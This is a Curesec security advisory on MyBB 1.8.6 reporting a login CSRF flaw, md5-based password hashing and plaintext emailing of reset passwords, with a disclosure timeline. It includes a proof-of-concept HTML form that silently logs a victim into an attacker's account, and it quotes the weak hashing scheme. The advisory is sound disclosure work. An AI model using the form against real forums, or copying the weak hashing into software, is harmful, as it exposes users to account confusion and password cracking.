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MyBB 1.8.6 CSRF Weak Hashing, Plaintext Passwords

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<HTML><HEAD><TITLE>MyBB 1.8.6 CSRF Weak Hashing, Plaintext Passwords</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>Security Advisory - Curesec Research Team 1. Introduction Affected Product: MyBB 1.8.6 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://www.mybb.com/ Vulnerability Type: CSRF, Weak Hashing, Plaintext Passwords Remote Exploitable: Yes Reported to vendor: 01/29/2016 Disclosed to public: 09/15/2016 Release mode: Full Disclosure / Informational CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview MyBB 1.8.6 is vulnerable to login CSRF. Additionally, it stores passwords using weak hashing, and sends passwords via email in plaintext. 3. Login CSRF Description CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N The login of MyBB does not have any CSRF protection. The impact of this is low, but a victim could provide sensitive information under a fake account. An example would be the accidental sending of a sensitive private message while being logged into an account controlled by an attacker. Additionally, a login CSRF makes it possible to exploit possible vulnerabilities in the user area, such as XSS. Proof of Concept <html> <body> <form action="http://localhost/mybb_1806/Upload/member.php"; method="POST"> <input type="hidden" name="action" value="do_login" /> <input type="hidden" name="url" value="http://localhost/mybb_1806/Upload/index.php"; /> <input type="hidden" name="quick_login" value="1" /> <input type="hidden" name= "quick_username" value="admin" /> <input type="hidden" name="quick_password" value="admin" /> <input type="hidden" name="quick_remember" value="yes" /> <input type="hidden" name="submit" value="Login" /> <input type="submit" value= "Submit request" /> </form> </body> </html> 4. Weak Hashing Description MyBB uses md5 for hashing passwords, which is not considered secure. The hashing used is: $hash = md5(md5($salt).md5($password)); 5. Passwords Emailed in Plaintext Description When passwords are reset, the generated 8 character password is send to the user via email in plaintext. It is suggested that users change these passwords, but a change is not required. It is recommended to use a password reset token instead, and to force the user to create a new password themselves. 6. Solution This issue was not fixed by the vendor. 7. Report Timeline 01/29/2016 Informed Vendor about Issue 02/26/2016 Vendor requests more time 03/11/2016 Vendor releases new version 03/15/2016 Requested information about unfixed issues 03/15/2016 Vendor considers issues minor and will not fix them for now 09/15/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/MyBB-186-CSRF-Weak-Hashing-Plaintext-Passwords-161.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH </BODY></HTML>

 

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